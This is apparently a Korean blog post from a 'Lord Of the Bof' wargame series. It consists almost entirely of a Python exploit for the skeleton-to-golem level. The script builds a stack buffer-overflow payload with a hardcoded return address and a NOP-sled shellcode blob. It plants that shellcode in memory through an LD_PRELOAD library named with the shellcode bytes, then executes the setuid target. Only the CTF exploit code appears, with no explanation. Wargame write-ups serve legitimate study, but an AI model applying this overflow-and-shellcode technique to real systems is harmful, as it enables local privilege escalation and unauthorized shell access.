exploit.py
import os
from struct import *
p = lambda x : pack("<L" , x)
path = '/home/skeleton/golem'
shellAddress = p(0xbffff530)
payload = "A"*44+shellAddress
shellCode = "\x90"*155+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"
os.system("touch test.c")
os.system("gcc -shared -fPIC -o " + shellCode + " test.c")
os.environ["LD_PRELOAD"] = "./"+shellCode
os.execl(path,path,payload)
'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글
| [Remind] LOB darkknight -> bugbear (0) | 2019.04.16 |
|---|---|
| [Remind] LOB golem -> darkknight (0) | 2019.04.16 |
| [Remind] LOB vampire -> skeleton (0) | 2019.04.16 |
| [Remind] LOB troll -> vampire (0) | 2019.04.16 |
| [Remind] LOB orge -> troll (0) | 2019.04.15 |
JeonYoungSin
메모 기록용 공간